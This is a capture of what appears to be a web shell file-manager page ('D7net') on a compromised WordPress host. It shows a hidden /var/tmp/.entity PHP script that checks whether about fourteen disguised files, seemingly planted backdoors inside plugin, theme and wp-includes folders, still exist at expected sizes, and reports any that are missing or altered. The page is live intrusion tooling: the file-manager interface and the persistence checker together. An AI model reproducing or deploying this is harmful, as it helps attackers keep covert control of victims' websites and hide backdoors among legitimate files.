D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
proc
/
self
/
root
/
proc
/
self
/
root
/
proc
/
self
/
root
/
var
/
tmp
/
Filename :
.entity
back
Copy
<?php $r = '/home/vblioqus/public_html'; $x = ["/wp-content/plugins/contact-1766697603/assets/js/custom_file_5_1766697604.php"=>"bd@@39022@@874", "/wp-content/plugins/gutena-forms/vendor/freemius/assets/css/admin/images1.php"=>"bd@@255137@@939", "/wp-content/themes/hello-elementor/vendor/elementor/wp-notifications-package/src/V120/compose.php"=>"bd@@234927@@899", "/wp-content/plugins/gutena-forms/vendor/freemius/includes/managers/class-fs-license-manager.php"=>"bd@@255720@@23", "/wp-includes/class-wp-site.php"=>"bd@@255721@@89", "/wp-content/themes/twentytwentyfive/patterns/cta-book-links.php"=>"bd@@255722@@56", "/wp-includes/theme-compat/embed-content.php"=>"bd@@255723@@83", "/wp-content/themes/twentytwentyfive/patterns/template-single-left-aligned-content.php"=>"bd@@255724@@94", "/wp-content/plugins/elementor/vendor/elementor/wp-one-package/src/Common/ads_user_request.php"=>"bd@@255725@@947", "/wp-content/plugins/wordpress-seo/src/task-list/infrastructure/tasks-collectors/tasks.collector.interface.php"=>"bd@@255726@@999", "/wp-content/plugins/wordpress-seo/src/dashboard/infrastructure/nonces/nonce.repository.php"=>"bd@@255727@@880", "/wp-content/plugins/wordpress-seo/src/dashboard/infrastructure/search-console/site.kit.search.php"=>"bd@@255728@@984", "/wp-content/plugins/contact-1766697603/assets/js/pcltar.lib.php"=>"bd@@254618@@926", "/wp-content/plugins/wordpress-seo/src/llms-txt/user-interface/health-check/file.reports.php"=>"bd@@255729@@882"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');